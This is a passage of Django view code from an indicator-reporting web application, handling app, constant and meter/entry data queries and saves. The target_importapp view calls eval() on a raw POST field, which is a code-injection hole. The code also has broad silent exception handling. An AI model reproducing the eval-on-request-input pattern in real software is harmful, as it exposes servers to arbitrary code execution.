'name': aw['name']\n })\n search_app.append({\n 'id': aa['id'],\n 'name': aa['name'],\n \"works\": works\n })\n\n return render(request, 'target_app_search.html',\n {'username': request.user.userinfo.fullname,\n \"operation_type_list\": operation_type_list,\n \"cycle_type_list\": cycle_type_list,\n \"business_type_list\": business_type_list,\n \"unit_list\": unit_list,\n \"source_list\": source_list,\n \"cycle_list\": cycle_list,\n \"storage_list\": storage_list,\n \"adminapp\": adminapp,\n \"search_app\": search_app,\n \"pagefuns\": getpagefuns(funid,request)})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef target_importapp(request):\n if request.user.is_authenticated():\n adminapp = request.POST.get(\"adminapp\", \"\")\n selectedtarget = request.POST.get('selectedtarget', '[]')\n\n result = {}\n try:\n app_id = int(adminapp)\n except:\n result[\"res\"] = '数据异常,请重新打开页面。'\n my_app = App.objects.exclude(state=\"9\").filter(id=app_id)\n if len(my_app) > 0:\n curapp = my_app[0]\n for target in eval(selectedtarget):\n try:\n my_target = Target.objects.exclude(state=\"9\").get(id=int(target))\n my_target.app.add(curapp)\n except Exception as e:\n print(e)\n result[\"res\"] = '导入完成。'\n else:\n result[\"res\"] = '当前应用不存在。'\n\n return JsonResponse(result)\n\n\ndef target_app_del(request):\n if request.user.is_authenticated():\n if 'id' in request.POST:\n adminapp = request.POST.get(\"adminapp\", \"\")\n id = request.POST.get('id', '')\n try:\n id = int(id)\n app_id = int(adminapp)\n except:\n raise Http404()\n my_app = App.objects.exclude(state=\"9\").get(id=app_id)\n target = Target.objects.get(id=id)\n target.app.remove(my_app)\n target.save()\n\n return HttpResponse(1)\n else:\n return HttpResponse(0)\n\n\ndef constant_index(request, funid):\n if request.user.is_authenticated():\n app_list = []\n applist = App.objects.all().exclude(state='9')\n for i in applist:\n app_list.append({\n \"app_name\": i.name,\n \"app_id\": i.id,\n })\n\n return render(request, 'constant.html',\n {'username': request.user.userinfo.fullname,\n \"app_list\": app_list,\n \"pagefuns\": getpagefuns(funid,request)})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef constant_data(request):\n if request.user.is_authenticated():\n search_adminapp = request.GET.get('search_adminapp', '')\n result = []\n all_constant = Constant.objects.exclude(state=\"9\").order_by(\"sort\")\n if search_adminapp != \"\":\n if search_adminapp == 'null':\n all_constant = all_constant.filter(adminapp=None)\n else:\n curadminapp = App.objects.get(id=int(search_adminapp))\n all_constant = all_constant.filter(adminapp=curadminapp)\n\n for constant in all_constant:\n adminapp_name = \"\"\n try:\n adminapp_name = constant.adminapp.name\n except:\n pass\n value = \"{:f}\".format(decimal.Decimal(str(constant.value) if str(constant.value) else \"0\").normalize())\n result.append({\n \"adminapp_name\": adminapp_name,\n \"id\": constant.id,\n \"name\": constant.name,\n \"unity\": constant.unity,\n \"code\": constant.code,\n \"value\": value,\n \"adminapp\": constant.adminapp_id,\n \"sort\": constant.sort,\n \"state\": constant.state,\n })\n return JsonResponse({\"data\": result})\n\n\ndef constant_save(request):\n if request.user.is_authenticated():\n id = request.POST.get(\"id\", \"\")\n name = request.POST.get(\"name\", \"\")\n code = request.POST.get(\"code\", \"\")\n value = request.POST.get(\"value\", \"\")\n adminapp = request.POST.get(\"adminapp\", \"\")\n sort = request.POST.get(\"sort\", \"\")\n unity = 
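Aside: constant_data below formats values with Decimal(...).normalize() inside "{:f}". The two pieces matter together: normalize() strips trailing zeros but can flip to exponent notation, and the fixed-point format undoes that. A runnable illustration:

import decimal

def plain_number(value):
    # normalize() drops trailing zeros; "{:f}" keeps the result out of
    # scientific notation (str() of the normalized 50.0 would be '5E+1').
    return "{:f}".format(decimal.Decimal(str(value)).normalize())

print(plain_number("12.3400"))  # -> 12.34
print(plain_number("50.0"))     # -> 50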
request.POST.get(\"unity\", \"\")\n\n all_app = App.objects.exclude(state=\"9\")\n\n try:\n id = int(id)\n except:\n raise Http404()\n\n result = {}\n\n if name.strip() == '':\n result[\"res\"] = '常数名称不能为空。'\n else:\n if code.strip() == '':\n result[\"res\"] = '常数代码不能为空。'\n else:\n if value.strip() == '':\n result[\"res\"] = '常数值不能为空。'\n else:\n if id == 0:\n all_constant = Constant.objects.filter(code=code).exclude(state=\"9\")\n all_target = Target.objects.filter(code=code).exclude(state=\"9\")\n if (len(all_constant) > 0):\n result[\"res\"] = '常数代码:' + code + '已存在。'\n else:\n if (len(all_target) > 0):\n result[\"res\"] = '指标库内已存在:' + code + '。'\n else:\n constant_save = Constant()\n constant_save.name = name\n constant_save.code = code\n constant_save.value = float(value)\n constant_save.unity = unity\n\n try:\n app_id = int(adminapp)\n my_app = all_app.get(id=app_id)\n constant_save.adminapp = my_app\n except:\n pass\n try:\n constant_save.sort = int(sort)\n except:\n pass\n constant_save.save()\n result[\"res\"] = \"保存成功。\"\n result[\"data\"] = constant_save.id\n\n else:\n all_constant = Constant.objects.filter(code=code).exclude(id=id).exclude(state=\"9\")\n all_target = Target.objects.filter(code=code).exclude(state=\"9\")\n if (len(all_constant) > 0):\n result[\"res\"] = '常数代码:' + code + '已存在。'\n else:\n if (len(all_target) > 0):\n result[\"res\"] = '指标库内已存在:' + code + '。'\n else:\n try:\n constant_save = Constant.objects.get(id=id)\n constant_save.name = name\n constant_save.code = code\n constant_save.value = float(value)\n constant_save.unity = unity\n\n try:\n app_id = int(adminapp)\n my_app = all_app.get(id=app_id)\n constant_save.adminapp = my_app\n except:\n pass\n try:\n constant_save.sort = int(sort)\n except:\n pass\n\n constant_save.save()\n result[\"res\"] = \"保存成功。\"\n result[\"data\"] = constant_save.id\n except Exception as e:\n result[\"res\"] = \"修改失败。\"\n\n return JsonResponse(result)\n\n\ndef constant_del(request):\n if request.user.is_authenticated():\n if 'id' in request.POST:\n id = request.POST.get('id', '')\n try:\n id = int(id)\n except:\n raise Http404()\n constant = Constant.objects.get(id=id)\n constant.state = \"9\"\n constant.save()\n return HttpResponse(1)\n else:\n return HttpResponse(0)\n\n\ndef constant_app_index(request, funid):\n if request.user.is_authenticated():\n try:\n cur_fun = Fun.objects.filter(id=int(funid)).exclude(state='9')\n adminapp = cur_fun[0].app\n except:\n return HttpResponseRedirect(\"/index\")\n\n return render(request, 'constant_app.html',\n {'username': request.user.userinfo.fullname,\n \"adminapp\": adminapp.id if adminapp else '',\n \"pagefuns\": getpagefuns(funid,request)})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef getreporting_date(date, cycletype):\n if cycletype == \"10\":\n date = datetime.datetime.strptime(date, \"%Y-%m-%d\")\n if cycletype == \"11\":\n date = datetime.datetime.strptime(date, \"%Y-%m\")\n year = date.year\n month = date.month\n a, b = calendar.monthrange(year, month) # a,b——weekday的第一天是星期几(0-6对应星期一到星期天)和这个月的所有天数\n date = datetime.datetime(year=year, month=month, day=b) # 构造本月月末datetime\n if cycletype == \"12\":\n date = datetime.datetime.strptime(date, \"%Y-%m-%d\")\n if cycletype == \"13\":\n date = datetime.datetime.strptime(date, \"%Y-%m-%d\")\n\n if cycletype == \"14\":\n date = datetime.datetime.strptime(date, \"%Y\")\n date = date.replace(month=12, day=31)\n\n return date\n\n\ndef getyesterdayreport_date(date, cycletype):\n yesterday = ''\n if cycletype == \"10\":\n yesterday 
= datetime.datetime.strptime(date, \"%Y-%m-%d\") - datetime.timedelta(days=1)\n if cycletype == \"11\":\n date = datetime.datetime.strptime(date, \"%Y-%m\")\n year = date.year\n if date.month == 1:\n year = date.year - 1\n month = 12\n a, b = calendar.monthrange(year, month)\n yesterday = datetime.datetime(year=year, month=month, day=b)\n else:\n month = date.month - 1\n a, b = calendar.monthrange(year, month)\n yesterday = datetime.datetime(year=year, month=month, day=b)\n if cycletype == \"12\":\n date = datetime.datetime.strptime(date, \"%Y-%m-%d\")\n year = date.year\n if date.month == 3:\n month = 12\n year = year - 1\n a, b = calendar.monthrange(year, month)\n yesterday = datetime.datetime(year=year, month=month, day=b)\n else:\n month = date.month - 3\n a, b = calendar.monthrange(year, month)\n yesterday = datetime.datetime(year=year, month=month, day=b)\n if cycletype == \"13\":\n date = datetime.datetime.strptime(date, \"%Y-%m-%d\")\n year = date.year\n if date.month == 6:\n month = 12\n year = year - 1\n a, b = calendar.monthrange(year, month)\n yesterday = datetime.datetime(year=year, month=month, day=b)\n else:\n month = date.month - 6\n a, b = calendar.monthrange(year, month)\n yesterday = datetime.datetime(year=year, month=month, day=b)\n if cycletype == \"14\":\n date = datetime.datetime.strptime(date, \"%Y\")\n year = date.year\n yesterday = date.replace(year=year-1, month=12, day=31)\n return yesterday\n\n\ndef reporting_index(request, cycletype, funid):\n \"\"\"\n 数据填报\n \"\"\"\n if request.user.is_authenticated():\n app = \"\"\n try:\n cur_fun = Fun.objects.filter(id=int(funid)).exclude(state='9')\n app = cur_fun[0].app_id\n work = cur_fun[0].work\n except:\n return HttpResponseRedirect(\"/index\")\n else:\n now = datetime.datetime.now().replace(hour=0, minute=0, second=0, microsecond=0) + datetime.timedelta(\n days=-1)\n date = now.strftime(\"%Y-%m-%d\")\n if cycletype == '10':\n now = datetime.datetime.now().replace(hour=0, minute=0, second=0, microsecond=0) + datetime.timedelta(\n days=-1)\n date = now.strftime(\"%Y-%m-%d\")\n if cycletype == '11':\n now = (datetime.datetime.now().replace(day=1, hour=0, minute=0, second=0,\n microsecond=0) + datetime.timedelta(\n days=-1))\n date = now.strftime(\"%Y-%m\")\n seasondate = ''\n if cycletype == '12':\n now = datetime.datetime.now()\n month = (now.month - 1) - (now.month - 1) % 3 + 1\n now = (datetime.datetime.now().replace(month=month, day=1, hour=0, minute=0, second=0,\n microsecond=0) + datetime.timedelta(\n days=-1))\n year = now.strftime(\"%Y\")\n if now.month in (1, 2, 3):\n season = '第1季度'\n seasondate = year + '-' + season\n date = year + '-' + \"03-31\"\n if now.month in (4, 5, 6):\n season = '第2季度'\n seasondate = year + '-' + season\n date = year + '-' + \"06-30\"\n if now.month in (7, 8, 9):\n season = '第3季度'\n seasondate = year + '-' + season\n date = year + '-' + \"09-30\"\n if now.month in (10, 11, 12):\n season = '第4季度'\n seasondate = year + '-' + season\n date = year + '-' + \"12-31\"\n yeardate = ''\n if cycletype == '13':\n now = datetime.datetime.now()\n month = (now.month - 1) - (now.month - 1) % 6 + 1\n now = (datetime.datetime.now().replace(month=month, day=1, hour=0, minute=0, second=0,\n microsecond=0) + datetime.timedelta(\n days=-1))\n year = now.strftime(\"%Y\")\n if now.month in (1, 2, 3, 4, 5, 6):\n season = '上半年'\n yeardate = year + '-' + season\n date = year + '-' + \"06-30\"\n if now.month in (7, 8, 9, 10, 11, 12):\n season = '下半年'\n yeardate = year + '-' + season\n date = year + '-' + 
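Aside: the month, quarter, and half-year branches of getyesterdayreport_date all do the same step -- go back a fixed number of months, wrap the year when needed, and snap to that month's last day. A hedged generalisation of that arithmetic:

import calendar
import datetime

def previous_period_end(date, months_back):
    month = date.month - months_back
    year = date.year
    if month < 1:           # wrapped past January
        month += 12
        year -= 1
    _, last_day = calendar.monthrange(year, month)
    return datetime.datetime(year, month, last_day)

print(previous_period_end(datetime.datetime(2024, 1, 31), 1))  # -> 2023-12-31
print(previous_period_end(datetime.datetime(2024, 4, 30), 3))  # -> 2024-01-31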
\"12-31\"\n if cycletype == '14':\n now = (datetime.datetime.now().replace(month=1, day=1, hour=0, minute=0, second=0,\n microsecond=0) + datetime.timedelta(\n days=-1))\n date = now.strftime(\"%Y\")\n\n searchtag = \"\"\n metertag = \"\"\n entrytag = \"\"\n extracttag = \"\"\n calculatetag = \"\"\n\n searchtagclass = \"\"\n metertagclass = \"\"\n entrytagclass = \"\"\n extracttagclass = \"\"\n calculatetagclass = \"\"\n\n searchtagtabclass = \"\"\n metertagtabclass = \"\"\n entrytagtabclass = \"\"\n extracttagtabclass = \"\"\n calculatetagtabclass = \"\"\n\n curapp = App.objects.filter(id=app)\n\n # 只有该功能对应的业务为核心业务,才显示数据查询标签\n if work is not None and work.core == '是':\n search_target = Target.objects.exclude(state='9').filter(cycletype=cycletype).filter(\n (Q(app__in=curapp) & ~Q(adminapp__id=app)) | (Q(adminapp__id=app) & ~Q(work__core='是'))\n ).values(\n 'adminapp__id', 'adminapp__name', 'work_id'\n )\n works = Work.objects.exclude(state='9').values(\n 'id', 'name', 'app_id'\n )\n else:\n search_target = []\n works = []\n\n meter_target = Target.objects.exclude(state='9').filter(cycletype=cycletype, adminapp_id=app, work=work,\n operationtype='1')\n entry_target = Target.objects.exclude(state='9').filter(cycletype=cycletype, adminapp_id=app, work=work,\n operationtype='15')\n extract_target = Target.objects.exclude(state='9').filter(cycletype=cycletype, adminapp_id=app, work=work,\n operationtype='16')\n calculate_target = Target.objects.exclude(state='9').filter(cycletype=cycletype, adminapp_id=app, work=work,\n operationtype='17')\n\n meter_data = getmodels(\"Meterdata\", str(now.year)).objects.exclude(state=\"9\").filter(\n target__adminapp_id=app,\n target__cycletype=cycletype,\n target__work=work,\n datadate=now)\n entry_data = getmodels(\"Entrydata\", str(now.year)).objects.exclude(state=\"9\").filter(\n target__adminapp_id=app,\n target__cycletype=cycletype,\n target__work=work,\n datadate=now)\n extract_data = getmodels(\"Extractdata\", str(now.year)).objects.exclude(state=\"9\").filter(\n target__adminapp_id=app,\n target__work=work,\n target__cycletype=cycletype, datadate=now)\n calculate_data = getmodels(\"Calculatedata\", str(now.year)).objects.exclude(state=\"9\").filter(\n target__adminapp_id=app,\n target__work=work,\n target__cycletype=cycletype, datadate=now)\n search_app = []\n check_search_app = []\n\n if not search_target:\n searchtag = \"display: none;\"\n else:\n for target in search_target:\n if target['adminapp__id']:\n works_list = []\n for w in works:\n if target['adminapp__id'] == w['app_id'] and w['id'] != work.id:\n # 过滤掉没有指标的业务项\n has_target = False\n\n for t in search_target:\n if t['work_id'] == w['id']:\n has_target = True\n break\n\n if has_target:\n works_list.append({\n 'id': w['id'],\n 'name': w['name']\n })\n\n # 数据查询的业务下拉框过滤掉没指标的项\n cursearchapp = {\n \"id\": target['adminapp__id'],\n \"name\": target['adminapp__name'],\n 'works': works_list,\n }\n check_cursearchapp = {\n \"id\": target['adminapp__id'],\n \"name\": target['adminapp__name'],\n }\n if check_cursearchapp not in check_search_app:\n search_app.append(cursearchapp)\n check_search_app.append(check_cursearchapp)\n if len(meter_target) <= 0 and len(meter_data) <= 0:\n metertag = \"display: none;\"\n if len(entry_target) <= 0 and len(entry_data) <= 0:\n entrytag = \"display: none;\"\n if len(extract_target) <= 0 and len(extract_data) <= 0:\n extracttag = \"display: none;\"\n if len(calculate_target) <= 0 and len(calculate_data) <= 0:\n calculatetag = \"display: none;\"\n\n if search_target 
is not None and len(search_target) > 0:\n searchtagclass = \"class=active\"\n searchtagtabclass = \"active in\"\n elif len(meter_target) > 0:\n metertagclass = \"class=active\"\n metertagtabclass = \"active in\"\n elif len(entry_target) > 0:\n entrytagclass = \"class=active\"\n entrytagtabclass = \"active in\"\n elif len(extract_target) > 0:\n extracttagclass = \"class=active\"\n extracttagtabclass = \"active in\"\n elif len(calculate_target) > 0:\n calculatetagclass = \"class=active\"\n calculatetagtabclass = \"active in\"\n\n return render(request, 'reporting.html',\n {'username': request.user.userinfo.fullname,\n \"cycletype\": cycletype,\n \"app\": app,\n \"date\": date,\n \"seasondate\": seasondate,\n \"yeardate\": yeardate,\n \"searchtag\": searchtag,\n \"metertag\": metertag,\n \"entrytag\": entrytag,\n \"extracttag\": extracttag,\n \"calculatetag\": calculatetag,\n \"searchtagclass\": searchtagclass,\n \"metertagclass\": metertagclass,\n \"entrytagclass\": entrytagclass,\n \"extracttagclass\": extracttagclass,\n \"calculatetagclass\": calculatetagclass,\n \"searchtagtabclass\": searchtagtabclass,\n \"metertagtabclass\": metertagtabclass,\n \"entrytagtabclass\": entrytagtabclass,\n \"extracttagtabclass\": extracttagtabclass,\n \"calculatetagtabclass\": calculatetagtabclass,\n \"search_app\": search_app,\n \"pagefuns\": getpagefuns(funid,request),\n \"funid\": funid})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef reporting_data(request):\n if request.user.is_authenticated():\n\n result = []\n app = request.GET.get('app', '')\n cycletype = request.GET.get('cycletype', '')\n reporting_date = request.GET.get('reporting_date', '')\n operationtype = request.GET.get('operationtype', '')\n funid = request.GET.get('funid', '')\n cy = request.GET.get('cycletype', '')\n date = request.GET.get('reporting_date', '')\n try:\n app = int(app)\n reporting_date = getreporting_date(reporting_date, cycletype)\n except:\n raise Http404()\n\n try:\n yesterday_report_date = getyesterdayreport_date(date, cy)\n except:\n pass\n all_data = []\n yesterday_all_data = []\n work = None\n try:\n funid = int(funid)\n fun = Fun.objects.get(id=funid)\n work = fun.work\n except:\n pass\n else:\n if operationtype == \"1\":\n all_data = getmodels(\"Meterdata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n target__adminapp_id=app, target__cycletype=cycletype, datadate=reporting_date,\n target__work=work).order_by(\"target__sort\").select_related(\"target\")\n\n yesterday_all_data = getmodels(\"Meterdata\", str(yesterday_report_date.year)).objects.exclude(state=\"9\").filter(\n target__adminapp_id=app, target__cycletype=cycletype, datadate=yesterday_report_date,\n target__work=work).order_by(\"target__sort\").select_related(\"target\").values('target_id', 'curvalue')\n\n if operationtype == \"15\":\n all_data = getmodels(\"Entrydata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n target__adminapp_id=app, target__cycletype=cycletype, datadate=reporting_date,\n target__work=work).order_by(\"target__sort\").select_related(\"target\")\n\n yesterday_all_data = getmodels(\"Entrydata\", str(yesterday_report_date.year)).objects.exclude(state=\"9\").filter(\n target__adminapp_id=app, target__cycletype=cycletype, datadate=yesterday_report_date,\n target__work=work).order_by(\"target__sort\").select_related(\"target\").values('target_id', 'curvalue')\n if operationtype == \"16\":\n all_data = getmodels(\"Extractdata\", 
str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n target__adminapp_id=app, target__cycletype=cycletype, datadate=reporting_date,\n target__work=work).order_by(\"target__sort\").select_related(\"target\")\n\n yesterday_all_data = getmodels(\"Extractdata\", str(yesterday_report_date.year)).objects.exclude(state=\"9\").filter(\n target__adminapp_id=app, target__cycletype=cycletype, datadate=yesterday_report_date,\n target__work=work).order_by(\"target__sort\").select_related(\"target\").values('target_id', 'curvalue')\n\n if operationtype == \"17\":\n all_data = getmodels(\"Calculatedata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n target__adminapp_id=app, target__cycletype=cycletype, datadate=reporting_date,\n target__work=work).order_by(\"target__sort\").select_related(\"target\")\n\n yesterday_all_data = getmodels(\"Calculatedata\", str(yesterday_report_date.year)).objects.exclude(state=\"9\").filter(\n target__adminapp_id=app, target__cycletype=cycletype, datadate=yesterday_report_date,\n target__work=work).order_by(\"target__sort\").select_related(\"target\").values('target_id', 'curvalue')\n\n all_dict_list = DictList.objects.exclude(state='9').values('id', 'name')\n\n # 电表走字数据\n all_changedata = Meterchangedata.objects.exclude(state=\"9\").filter(datadate=reporting_date).values()\n for data in all_data:\n businesstypename = data.target.businesstype\n\n try:\n if businesstypename:\n for dict in all_dict_list:\n if businesstypename == str(dict['id']):\n businesstypename = dict['name']\n break\n except:\n pass\n unitname = data.target.unit\n try:\n if unitname:\n for dict in all_dict_list:\n if unitname == str(dict['id']):\n unitname = dict['name']\n break\n except:\n pass\n todayvalue = \"\"\n judgevalue = \"\"\n curvalue = \"\"\n curvaluedate = \"\"\n cumulativemonth = \"\"\n cumulativequarter = \"\"\n cumulativehalfyear = \"\"\n cumulativeyear = \"\"\n try:\n todayvalue = round(data.todayvalue, data.target.digit)\n except:\n pass\n try:\n judgevalue = round(data.judgevalue, data.target.digit)\n except:\n pass\n try:\n curvalue = round(data.curvalue, data.target.digit)\n except:\n pass\n try:\n curvaluedate = data.curvaluedate.strftime('%Y-%m-%d %H:%M:%S') if data.curvaluedate else \"\",\n except:\n pass\n if data.target.cumulative in ['1', '2', '3', '4', '5']:\n try:\n cumulativemonth = round(data.cumulativemonth, data.target.digit)\n except:\n pass\n try:\n cumulativequarter = round(data.cumulativequarter, data.target.digit)\n except:\n pass\n try:\n cumulativehalfyear = round(data.cumulativehalfyear, data.target.digit)\n except:\n pass\n try:\n cumulativeyear = round(data.cumulativeyear, data.target.digit)\n except:\n pass\n yesterday_curvalue = ''\n for yesterdata in yesterday_all_data:\n if yesterdata['target_id'] == data.target_id:\n yesterday_curvalue = round(yesterdata['curvalue'], data.target.digit)\n break\n\n if operationtype in (\"15\", \"16\", \"17\"):\n result.append({\n \"id\": data.id,\n\n \"todayvalue\": todayvalue,\n \"judgevalue\": judgevalue,\n\n \"curvalue\": curvalue,\n \"curvaluedate\": curvaluedate,\n \"curvaluetext\": data.curvaluetext if data.curvaluetext else '',\n \"cumulativemonth\": cumulativemonth,\n \"cumulativequarter\": cumulativequarter,\n \"cumulativehalfyear\": cumulativehalfyear,\n \"cumulativeyear\": cumulativeyear,\n \"releasestate\": data.releasestate,\n \"target_id\": data.target.id,\n \"target_name\": data.target.name,\n \"target_unity\": data.target.unity,\n \"target_code\": data.target.code,\n 
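Aside: every display value in this view is produced by the same try/round/except-pass dance against the target's configured digit count. A small helper with identical fall-through to the blank display value:

def round_or_blank(value, digits):
    # None and text values raise TypeError inside round(); the view shows
    # them as empty strings, so mirror that here.
    try:
        return round(value, digits)
    except TypeError:
        return ""

print(round_or_blank(3.14159, 2))  # -> 3.14
print(round_or_blank(None, 2))     # -> (empty string)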
\"target_businesstype\": data.target.businesstype,\n \"target_unit\": data.target.unit,\n \"target_businesstypename\": businesstypename,\n \"target_unitname\": unitname,\n \"target_datatype\": data.target.datatype,\n \"target_cumulative\": data.target.cumulative,\n \"target_magnification\": data.target.magnification,\n \"target_upperlimit\": data.target.upperlimit,\n \"target_lowerlimit\": data.target.lowerlimit,\n \"target_warn_range\": data.target.warn_range,\n \"yesterday_curvalue\": yesterday_curvalue\n\n })\n elif operationtype == \"1\":\n zerodata = \"{:f}\".format(decimal.Decimal(data.zerodata if data.zerodata else \"0\").normalize())\n twentyfourdata = \"{:f}\".format(\n decimal.Decimal(data.twentyfourdata if data.zerodata else \"0\").normalize())\n metervalue = data.metervalue if data.metervalue else 0\n meterchangedata_id = \"\"\n oldtable_zerodata = \"\"\n oldtable_twentyfourdata = \"\"\n oldtable_value = \"\"\n oldtable_magnification = \"\"\n oldtable_finalvalue = \"\"\n newtable_zerodata = \"\"\n newtable_twentyfourdata = \"\"\n newtable_value = \"\"\n newtable_magnification = \"\"\n newtable_finalvalue = \"\"\n finalvalue = \"\"\n\n cur_meterchange = {}\n for mcd in all_changedata:\n if mcd['meterdata'] == data.id:\n cur_meterchange = mcd\n break\n\n if cur_meterchange:\n meterchangedata_id = cur_meterchange['id']\n oldtable_zerodata = cur_meterchange['oldtable_zerodata']\n oldtable_twentyfourdata = cur_meterchange['oldtable_twentyfourdata']\n oldtable_value = cur_meterchange['oldtable_value']\n oldtable_magnification = cur_meterchange['oldtable_magnification']\n oldtable_finalvalue = cur_meterchange['oldtable_finalvalue']\n newtable_zerodata = cur_meterchange['newtable_zerodata']\n newtable_twentyfourdata = cur_meterchange['newtable_twentyfourdata']\n newtable_value = cur_meterchange['newtable_value']\n newtable_magnification = cur_meterchange['newtable_magnification']\n newtable_finalvalue = cur_meterchange['newtable_finalvalue']\n finalvalue = cur_meterchange['finalvalue']\n if data.target.cumulative in ['1', '2', '3', '4', '5']:\n try:\n oldtable_zerodata = round(oldtable_zerodata, data.target.digit)\n except:\n pass\n try:\n oldtable_twentyfourdata = round(oldtable_twentyfourdata, data.target.digit)\n except:\n pass\n try:\n oldtable_value = round(oldtable_value, data.target.digit)\n except:\n pass\n try:\n oldtable_magnification = round(oldtable_magnification, data.target.digit)\n except:\n pass\n try:\n oldtable_finalvalue = round(oldtable_finalvalue, data.target.digit)\n except:\n pass\n try:\n newtable_zerodata = round(newtable_zerodata, data.target.digit)\n except:\n pass\n try:\n newtable_twentyfourdata = round(newtable_twentyfourdata, data.target.digit)\n except:\n pass\n try:\n newtable_value = round(newtable_value, data.target.digit)\n except:\n pass\n try:\n newtable_magnification = round(newtable_magnification, data.target.digit)\n except:\n pass\n try:\n newtable_finalvalue = round(newtable_finalvalue, data.target.digit)\n except:\n pass\n try:\n finalvalue = round(finalvalue, data.target.digit)\n except:\n pass\n\n result.append({\n \"id\": data.id,\n \"todayvalue\": todayvalue,\n \"judgevalue\": judgevalue,\n \"curvalue\": curvalue,\n \"curvaluedate\": curvaluedate,\n \"curvaluetext\": data.curvaluetext,\n \"cumulativemonth\": cumulativemonth,\n \"cumulativequarter\": cumulativequarter,\n \"cumulativehalfyear\": cumulativehalfyear,\n \"cumulativeyear\": cumulativeyear,\n \"releasestate\": data.releasestate,\n \"target_id\": data.target.id,\n 
\"target_name\": data.target.name,\n \"target_unity\": data.target.unity,\n \"target_code\": data.target.code,\n \"target_businesstype\": data.target.businesstype,\n \"target_unit\": data.target.unit,\n \"target_businesstypename\": businesstypename,\n \"target_unitname\": unitname,\n \"target_datatype\": data.target.datatype,\n \"target_cumulative\": data.target.cumulative,\n \"target_magnification\": data.target.magnification,\n \"target_upperlimit\": data.target.upperlimit,\n \"target_lowerlimit\": data.target.lowerlimit,\n \"target_warn_range\": data.target.warn_range,\n \"yesterday_curvalue\": yesterday_curvalue,\n\n \"zerodata\": zerodata,\n \"twentyfourdata\": twentyfourdata,\n \"metervalue\": metervalue,\n \"meterchangedata_id\": meterchangedata_id,\n \"oldtable_zerodata\": oldtable_zerodata,\n \"oldtable_twentyfourdata\": oldtable_twentyfourdata,\n \"oldtable_value\": oldtable_value,\n \"oldtable_magnification\": oldtable_magnification,\n \"oldtable_finalvalue\": oldtable_finalvalue,\n \"newtable_zerodata\": newtable_zerodata,\n \"newtable_twentyfourdata\": newtable_twentyfourdata,\n \"newtable_value\": newtable_value,\n \"newtable_magnification\": newtable_magnification,\n \"newtable_finalvalue\": newtable_finalvalue,\n \"finalvalue\": finalvalue,\n\n })\n return JsonResponse({\"data\": result})\n\n\ndef reporting_search_data(request):\n if request.user.is_authenticated():\n\n result = []\n app = request.GET.get('app', '')\n cycletype = request.GET.get('cycletype', '')\n reporting_date = request.GET.get('reporting_date', '')\n searchapp = request.GET.get('searchapp', '')\n works = request.GET.get('works', '')\n\n try:\n app = int(app)\n reporting_date = getreporting_date(reporting_date, cycletype)\n except:\n raise Http404()\n all_data = []\n\n # 查询的内容目前为非本应用的有查询权限的查询指标,应该再加上本应用内的非核心业务的指标\n # >> 除本应用核心业务之外的所有指标\n except_works = Work.objects.exclude(state='9').filter(app_id=app, core='是')\n\n curapp = App.objects.get(id=app)\n all_target = Target.objects.exclude(state=\"9\").exclude(work__in=except_works). 
\\\n filter(cycletype=cycletype).filter(Q(app=curapp) | Q(adminapp=curapp)).order_by(\"adminapp\", \"operationtype\",\n \"sort\")\n\n if searchapp != \"\":\n try:\n cursearchapp = App.objects.get(id=int(searchapp))\n all_target = all_target.filter(adminapp=cursearchapp)\n except:\n pass\n\n if works != \"\":\n try:\n works = int(works)\n all_target = all_target.filter(work_id=works)\n except Exception as e:\n print(e)\n\n for target in all_target:\n curtargetdata = {\"target\": target, \"zerodata\": \"\", \"twentyfourdata\": \"\", \"metervalue\": \"\", \"todayvalue\": \"\",\n \"judgevalue\": \"\", \"curvalue\": \"\",\n \"curvaluedate\": \"\", \"curvaluetext\": \"\", \"cumulativemonth\": \"\", \"cumulativequarter\": \"\",\n \"cumulativehalfyear\": \"\", \"cumulativeyear\": \"\", \"releasestate\": \"\"}\n if target.operationtype == \"15\":\n targetvalue = getmodels(\"Entrydata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n target=target, datadate=reporting_date)\n if len(targetvalue) > 0:\n curtargetdata = {\"target\": target, \"zerodata\": \"\", \"twentyfourdata\": \"\", \"metervalue\": \"\",\n \"curvalue\": targetvalue[0].curvalue, \"todayvalue\": targetvalue[0].todayvalue,\n \"judgevalue\": targetvalue[0].judgevalue,\n \"curvaluedate\": targetvalue[0].curvaluedate,\n \"curvaluetext\": targetvalue[0].curvaluetext,\n \"cumulativemonth\": targetvalue[0].cumulativemonth,\n \"cumulativequarter\": targetvalue[0].cumulativequarter,\n \"cumulativehalfyear\": targetvalue[0].cumulativehalfyear,\n \"cumulativeyear\": targetvalue[0].cumulativeyear,\n \"releasestate\": targetvalue[0].releasestate}\n elif target.operationtype == \"16\":\n targetvalue = getmodels(\"Extractdata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n target=target, datadate=reporting_date)\n if len(targetvalue) > 0:\n curtargetdata = {\"target\": target, \"zerodata\": \"\", \"twentyfourdata\": \"\", \"metervalue\": \"\",\n \"todayvalue\": targetvalue[0].todayvalue,\"judgevalue\": targetvalue[0].judgevalue,\n \"curvalue\": targetvalue[0].curvalue, \"curvaluedate\": targetvalue[0].curvaluedate,\n \"curvaluetext\": targetvalue[0].curvaluetext,\n \"cumulativemonth\": targetvalue[0].cumulativemonth,\n \"cumulativequarter\": targetvalue[0].cumulativequarter,\n \"cumulativehalfyear\": targetvalue[0].cumulativehalfyear,\n \"cumulativeyear\": targetvalue[0].cumulativeyear,\n \"releasestate\": targetvalue[0].releasestate}\n elif target.operationtype == \"17\":\n targetvalue = getmodels(\"Calculatedata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n target=target, datadate=reporting_date)\n if len(targetvalue) > 0:\n curtargetdata = {\"target\": target, \"zerodata\": \"\", \"twentyfourdata\": \"\", \"metervalue\": \"\",\n \"todayvalue\": targetvalue[0].todayvalue,\"judgevalue\": targetvalue[0].judgevalue,\n \"curvalue\": targetvalue[0].curvalue, \"curvaluedate\": targetvalue[0].curvaluedate,\n \"curvaluetext\": targetvalue[0].curvaluetext,\n \"cumulativemonth\": targetvalue[0].cumulativemonth,\n \"cumulativequarter\": 